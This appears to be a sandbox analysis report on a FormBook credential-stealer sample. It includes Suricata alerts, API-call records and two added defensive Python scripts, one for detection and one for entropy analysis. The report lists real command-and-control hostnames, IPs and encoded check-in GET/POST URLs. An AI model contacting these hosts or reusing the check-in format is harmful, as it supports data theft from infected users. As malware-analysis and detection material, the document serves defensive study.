Summary | ZeroBOX

vbc.exe

Tags: Formbook, Malicious Library, PE32, PE File

Category: FILE
Machine: s1_win7_x6401
Started: May 18, 2023, 10:43 a.m.
Completed: May 18, 2023, 10:45 a.m.
Size 186.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 59f9df6fb26fb1a5c6343a443075649b
SHA256 f4611e247ca37320626c3b06c1fab325db0ce1052e9d9b4d2d22572bc83f30a6
CRC32 17613E84
ssdeep 3072:Tg5nTzdiQSnMzqOC4xUHwJnfV7hvJr+C4uzX6KmZFIQ2yyLgLiyn3YiT4lXG0Cm:Tg5TzBWkvxxuwVNtvJV4uzXkKabToxB
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Suricata Alerts

Flow | SID | Signature | Category
(identical rows collapsed; "xN" is the number of times that row appears in the log)
UDP 192.168.56.101:55146 -> 164.124.101.2:53 | 2027867 | ET INFO Observed DNS Query to .life TLD | Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 5.157.87.204:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 54.196.16.164:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 67.223.117.160:80 | 2027876 | ET INFO HTTP Request to Suspicious *.life Domain | Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 67.223.117.160:80 | 2027876 (x3) | ET INFO HTTP Request to Suspicious *.life Domain | Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 67.223.117.160:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 185.27.134.115:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 45.130.230.191:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 154.94.121.119:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 208.113.186.56:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 104.21.34.8:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80 | 2032991 (x9) | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 137.220.202.242:80 | 2031412, 2031449, 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Suspicious HTTP requests (signature: GET method with no User-Agent header)
  GET http://www.smartinnoventions.com/f619/?E9W=Ek2xhbXtY1qXzB2JvbkcFvKbSmJm4K+Uyb5xsLYZ3zgsIlX7EFjcw6TuiLcQZ5KUivhxYJn0P8EizsHxKHQ+wy4OSt0bovGghjBDZDE=&NC=ptGp
  GET http://www.intake-tree.com/f619/?E9W=YCaZye8ndW5O5ejCJ7uN2558Y+97WERyr3klZ+XCKIlwv4gr+zruhmNXWBgIbED6mtP3DBYvR0gpojWOjcOh+ihVnCiMcphzPiGO29A=&NC=ptGp
  GET http://www.towfire.life/f619/?E9W=Ehbg4LlyVMHP0pAFmIQxhDDkp6Kxs477sF6nDv0EaT5K8/1GH5wf1bgzqSKTUaDZXTnW9d28cNYQDMZcc5x0F8aQqyCdRYlsL10lLoU=&NC=ptGp
  GET http://www.gospelfy.online/f619/?E9W=mqENKO6x6u0B1RhcdIeKlgDLrDi38FKwdcw4276gfXsD1t5r0KVruS6mnpdZvtzm+Q0xGOUHk2EA1TA3TL1CSm4H2R6TK8LtJrZ83YI=&NC=ptGp
  GET http://www.queenkidul.com/f619/?E9W=flPn1CpczsmcmsloYAj+WZ9tyIXCLn2BUp15WA9gR+pRAl39PMpr22E4uA5K3fGksCy6GKGUT/KR36S7pADHdFopIcR3oqkCWwUH3Bw=&NC=ptGp
  GET http://www.sockmomma.com/f619/?E9W=2xrbRaVqfFZAqlIaVxxROj1er0vApHth0WR1aJHeUhlKoHhTuPzXEzX44r40ys20rE4Ka7hzk9c+zV+d/czmBtVLQF0HWkNVVexiFz0=&NC=ptGp
  GET http://www.stephenwang.photography/f619/?E9W=u5f4p4qz7o/fTtDm3nSz6hiFO4aCCN2AsW/usgJw6zJdWxar6/CI5CJVoaMo1PtwYoo0+7BD2Z2qbjCMw+JlDyQ8u/oV4aU03sHkcSA=&NC=ptGp
  GET http://www.skillfulp10.buzz/f619/?E9W=35x6vbxblib5MVXL66MiYOFyCwyiW+WpCMCOaRW/LabtpXpMR316Gm+YR9yWJR7EH7/o0i+7abS9fGbf51xT5oPd3YLLmnWOCyaGRj8=&NC=ptGp
  GET http://www.28588v.com/f619/?E9W=G3I5ds8dOpaKd+DH1ake2pRuUN+UMAJZaHOz+8NtztMbt4Q0fuIWaSpOJ5XO92YffYK2mOkzi8XK+GtmVritvfJB+FClpV7RO2AgtZU=&NC=ptGp
HTTP requests (in the order recorded)
  POST http://www.smartinnoventions.com/f619/
  GET  http://www.smartinnoventions.com/f619/?E9W=Ek2xhbXtY1qXzB2JvbkcFvKbSmJm4K+Uyb5xsLYZ3zgsIlX7EFjcw6TuiLcQZ5KUivhxYJn0P8EizsHxKHQ+wy4OSt0bovGghjBDZDE=&NC=ptGp
  GET  http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip
  POST http://www.intake-tree.com/f619/
  GET  http://www.intake-tree.com/f619/?E9W=YCaZye8ndW5O5ejCJ7uN2558Y+97WERyr3klZ+XCKIlwv4gr+zruhmNXWBgIbED6mtP3DBYvR0gpojWOjcOh+ihVnCiMcphzPiGO29A=&NC=ptGp
  POST http://www.towfire.life/f619/
  GET  http://www.towfire.life/f619/?E9W=Ehbg4LlyVMHP0pAFmIQxhDDkp6Kxs477sF6nDv0EaT5K8/1GH5wf1bgzqSKTUaDZXTnW9d28cNYQDMZcc5x0F8aQqyCdRYlsL10lLoU=&NC=ptGp
  POST http://www.gospelfy.online/f619/
  GET  http://www.gospelfy.online/f619/?E9W=mqENKO6x6u0B1RhcdIeKlgDLrDi38FKwdcw4276gfXsD1t5r0KVruS6mnpdZvtzm+Q0xGOUHk2EA1TA3TL1CSm4H2R6TK8LtJrZ83YI=&NC=ptGp
  POST http://www.queenkidul.com/f619/
  GET  http://www.queenkidul.com/f619/?E9W=flPn1CpczsmcmsloYAj+WZ9tyIXCLn2BUp15WA9gR+pRAl39PMpr22E4uA5K3fGksCy6GKGUT/KR36S7pADHdFopIcR3oqkCWwUH3Bw=&NC=ptGp
  POST http://www.sockmomma.com/f619/
  GET  http://www.sockmomma.com/f619/?E9W=2xrbRaVqfFZAqlIaVxxROj1er0vApHth0WR1aJHeUhlKoHhTuPzXEzX44r40ys20rE4Ka7hzk9c+zV+d/czmBtVLQF0HWkNVVexiFz0=&NC=ptGp
  POST http://www.stephenwang.photography/f619/
  GET  http://www.stephenwang.photography/f619/?E9W=u5f4p4qz7o/fTtDm3nSz6hiFO4aCCN2AsW/usgJw6zJdWxar6/CI5CJVoaMo1PtwYoo0+7BD2Z2qbjCMw+JlDyQ8u/oV4aU03sHkcSA=&NC=ptGp
  POST http://www.skillfulp10.buzz/f619/
  GET  http://www.skillfulp10.buzz/f619/?E9W=35x6vbxblib5MVXL66MiYOFyCwyiW+WpCMCOaRW/LabtpXpMR316Gm+YR9yWJR7EH7/o0i+7abS9fGbf51xT5oPd3YLLmnWOCyaGRj8=&NC=ptGp
  POST http://www.28588v.com/f619/
  GET  http://www.28588v.com/f619/?E9W=G3I5ds8dOpaKd+DH1ake2pRuUN+UMAJZaHOz+8NtztMbt4Q0fuIWaSpOJ5XO92YffYK2mOkzi8XK+GtmVritvfJB+FClpV7RO2AgtZU=&NC=ptGp
  POST http://www.smartinnoventions.com/f619/
  POST http://www.intake-tree.com/f619/
  POST http://www.towfire.life/f619/
  POST http://www.gospelfy.online/f619/
  POST http://www.queenkidul.com/f619/
  POST http://www.sockmomma.com/f619/
  POST http://www.stephenwang.photography/f619/
  POST http://www.skillfulp10.buzz/f619/
  POST http://www.28588v.com/f619/
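The check-in URLs above share one shape: a short path segment (/f619/) that is identical across nine unrelated hosts, a query with one short key carrying a base64 blob and a second short key carrying a small token, no User-Agent header, and a GET followed by POSTs to the same path. The script below is an added example, not part of the ZeroBOX report or of any ET rule, that turns that shape into a detection over proxy-log lines and then pivots on the path id across hosts, which is the strongest signal in this report. The log format (src method url user-agent, with "-" when the header was absent), the benign 10.0.0.7 lines and the two-host threshold are assumptions; the three /f619/ URLs are copied from the request list. One caveat for anyone tuning this: the download from www.sqlite.org is the only request to a legitimate host, but it belongs to the same activity (FormBook is known to fetch this DLL to read browser credential databases), so a hit on it should not be discounted as an allow-list match.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log (not from the report): "src method url user_agent", with
# "-" when the User-Agent header was absent. The three /f619/ URLs are copied from
# the request list above; the 10.0.0.7 lines are benign decoys added for contrast.
SAMPLE_LOG = """\
192.168.56.101 GET http://www.smartinnoventions.com/f619/?E9W=Ek2xhbXtY1qXzB2JvbkcFvKbSmJm4K+Uyb5xsLYZ3zgsIlX7EFjcw6TuiLcQZ5KUivhxYJn0P8EizsHxKHQ+wy4OSt0bovGghjBDZDE=&NC=ptGp -
192.168.56.101 POST http://www.smartinnoventions.com/f619/ -
192.168.56.101 GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip -
192.168.56.101 GET http://www.towfire.life/f619/?E9W=Ehbg4LlyVMHP0pAFmIQxhDDkp6Kxs477sF6nDv0EaT5K8/1GH5wf1bgzqSKTUaDZXTnW9d28cNYQDMZcc5x0F8aQqyCdRYlsL10lLoU=&NC=ptGp -
192.168.56.101 GET http://www.skillfulp10.buzz/f619/?E9W=35x6vbxblib5MVXL66MiYOFyCwyiW+WpCMCOaRW/LabtpXpMR316Gm+YR9yWJR7EH7/o0i+7abS9fGbf51xT5oPd3YLLmnWOCyaGRj8=&NC=ptGp -
10.0.0.7 GET http://example.com/f619/?q=hello&id=42 Mozilla/5.0
10.0.0.7 GET http://cdn.example.net/assets/app.js?v=abc123 Mozilla/5.0
"""

# Assumed shape of the check-in path: a single short alphanumeric segment, e.g. /f619/
PATH_RE = re.compile(r"^/([a-z0-9]{3,5})/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_log(text):
    """Split the constructed log format into records. The User-Agent is the fourth
    field and may contain spaces, so split at most three times."""
    records = []
    for line in text.splitlines():
        if line.strip():
            src, method, url, ua = line.split(maxsplit=3)
            records.append({"src": src, "method": method, "url": url, "user_agent": ua})
    return records


def split_query(query):
    """Raw key/value split. urllib's parse_qsl would turn '+' into a space and
    corrupt the base64 blob, so do it by hand and keep values verbatim."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs


def query_looks_like_checkin(query):
    """Exactly two parameters: a 2-4 char key with a long base64 blob, then a 2-4 char
    key with a short alphanumeric token (E9W=<blob>&NC=ptGp in the report)."""
    pairs = split_query(query)
    if len(pairs) != 2:
        return False
    (k1, v1), (k2, v2) = pairs
    return (2 <= len(k1) <= 4 and len(v1) >= 64 and B64_RE.match(v1) is not None
            and 2 <= len(k2) <= 4 and 2 <= len(v2) <= 8 and v2.isalnum())


def checkin_path_id(rec):
    """Return the path id (e.g. 'f619') when a request has the check-in shape: short
    path, no User-Agent, and either a GET carrying the encoded query or a bare POST
    to the same path. None otherwise, so a normal site using /f619/ is not flagged."""
    parts = urlsplit(rec["url"])
    m = PATH_RE.match(parts.path)
    if m is None or rec["user_agent"] not in ("", "-"):
        return None
    if rec["method"] == "GET" and query_looks_like_checkin(parts.query):
        return m.group(1)
    if rec["method"] == "POST" and not parts.query:
        return m.group(1)
    return None


def correlate(records, min_hosts=2):
    """Group candidate check-ins by (source, path id) and keep groups that span several
    distinct hosts: the sample walks a list of decoy domains with one fixed path id,
    and that reuse is far more specific than any single request."""
    groups = defaultdict(lambda: {"hosts": set(), "requests": 0})
    for rec in records:
        pid = checkin_path_id(rec)
        if pid is None:
            continue
        g = groups[(rec["src"], pid)]
        g["hosts"].add(urlsplit(rec["url"]).hostname)
        g["requests"] += 1
    return {key: g for key, g in groups.items() if len(g["hosts"]) >= min_hosts}


if __name__ == "__main__":
    for (src, pid), g in correlate(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: path /{pid}/ reused against {len(g['hosts'])} hosts "
              f"in {g['requests']} requests: {sorted(g['hosts'])}")
```

Run it over a real proxy export by replacing SAMPLE_LOG with the file contents in the same four-field layout; raise min_hosts if a single path id across two hosts turns out to be common in your environment.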
API calls (arguments, then status / return / repeated)

NtProtectVirtualMemory
  process_identifier: 2556
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 188416 (0x2E000, the page-rounded virtual_size 0x2d4e4 of the .text section)
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x013e1000 (RVA 0x1000, the start of .text, if the image is loaded at 0x013e0000)
  process_handle: 0xffffffff (current process)
  status: 1  return: 0  repeated: 0

NtProtectVirtualMemory
  process_identifier: 2556
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 12288 (0x3000, the first three pages of the same region)
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x013e1000
  process_handle: 0xffffffff (current process)
  status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory
  process_identifier: 2556
  region_size: 3158016 (0x303000, about 3 MB, outside the loaded image)
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x00840000
  allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
  process_handle: 0xffffffff (current process)
  status: 1  return: 0  repeated: 0
Section with high entropy
  name: .text
  virtual_address: 0x00001000
  virtual_size: 0x0002d4e4
  size_of_data: 0x0002d600
  entropy: 7.9964 (bits per byte; 8.0 is the maximum)
  description: A section with a high entropy has been found
Overall entropy of this PE file is high
  entropy: 1.0 (a 0-1 ratio, not bits per byte)
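The two entropy signatures above and the NtProtectVirtualMemory record are two views of the same thing: 188416 is 0x2E000, the page-rounded virtual_size of .text (0x2d4e4), and 0x013e1000 is RVA 0x1000 if the image is loaded at 0x013e0000, so the call makes the entire high-entropy code section writable and executable in place. The Python below is an added example, not ZeroBOX code and not from the report, showing how both checks are computed from a PE file with the standard library only: read the section table, score each section's entropy, and map a memory-protection event (base_address, length) back onto the section it covers. The PE it analyses is built inline (a constructed two-section image, not the vbc.exe sample) and the image base 0x013e0000 is an assumption; only the page arithmetic from the report is reproduced as-is.

```python
import hashlib
import math
import struct
from collections import Counter

PAGE = 0x1000


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    return max(0.0, -sum((c / n) * math.log2(c / n) for c in Counter(data).values()))


def page_round(size):
    """Round up to the 4 KiB page granularity the memory manager applies to sections."""
    return (size + PAGE - 1) & ~(PAGE - 1)


def parse_pe(pe):
    """Stdlib-only reader for the image base and section table of a PE32/PE32+ file.
    Returns (image_base, [section dicts])."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:        # PE32: ImageBase is a u32 at optional-header offset 28
        image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    elif magic == 0x20B:      # PE32+: ImageBase is a u64 at optional-header offset 24
        image_base = struct.unpack_from("<Q", pe, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsec):     # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize,
                         "raw_offset": rptr, "raw_size": rsize, "characteristics": chars})
    return image_base, sections


def section_entropy_report(pe, threshold=7.0):
    """Entropy of each section's raw bytes; >= threshold is the usual packed/encrypted signal."""
    _, sections = parse_pe(pe)
    report = []
    for s in sections:
        ent = shannon_entropy(pe[s["raw_offset"]:s["raw_offset"] + s["raw_size"]])
        report.append({**s, "entropy": round(ent, 4), "high_entropy": ent >= threshold})
    return report


def section_for_protect(sections, image_base, base_address, length):
    """Map an NtProtectVirtualMemory (base_address, length) onto the section it starts in,
    assuming the module is loaded at image_base. The second value is True when length
    equals the section's page-rounded virtual size, i.e. the whole section was flipped
    (188416 == page_round(0x2d4e4) in the report). (None, False) if outside the image."""
    rva = base_address - image_base
    for s in sections:
        start = s["virtual_address"]
        if start <= rva < start + page_round(s["virtual_size"]):
            return s, length == page_round(s["virtual_size"])
    return None, False


def build_test_pe(image_base=0x013E0000):
    """Constructed two-section PE32 (not the vbc.exe sample): a deterministic
    pseudo-random .text that looks packed and a zero-filled .data. The default
    image_base is an assumption chosen so the report's 0x013e1000 lands in .text."""
    text, block = b"", b"constructed seed"
    while len(text) < 0x2000:                      # sha256 chain: high-entropy filler
        block = hashlib.sha256(block).digest()
        text += block
    data = b"\0" * 0x1000
    hdr_size = 0x400
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 32, PAGE)                         # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                        # FileAlignment
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x1F80, 0x1000, len(text), hdr_size,
                      0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".data", 0x1000, 0x3000, len(data),
                       hdr_size + len(text), 0, 0, 0, 0, 0xC0000040)
    return (dos + coff + bytes(opt) + sec).ljust(hdr_size, b"\0") + text + data


if __name__ == "__main__":
    pe = build_test_pe()
    base, secs = parse_pe(pe)
    for s in section_entropy_report(pe):
        print(f"{s['name']:8} entropy={s['entropy']:.4f} high={s['high_entropy']}")
    sec, whole = section_for_protect(secs, base, 0x013E1000, page_round(0x1F80))
    print(f"RWX flip at 0x013e1000 covers {sec['name']}, whole section: {whole}")
```

To run this against the real sample, read the file into `pe`, call `parse_pe` for the on-disk image base, and feed the report's base_address and length into `section_for_protect`; a whole-section flip of a section that also scores close to 8.0 bits per byte is the in-place unpacking pattern, while the 3 MB RWX allocation at 0x00840000 falls outside the image and maps to no section at all.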
LookupPrivilegeValueW
  system_name: (empty)
  privilege_name: SeDebugPrivilege
  status: 1  return: 1  repeated: 0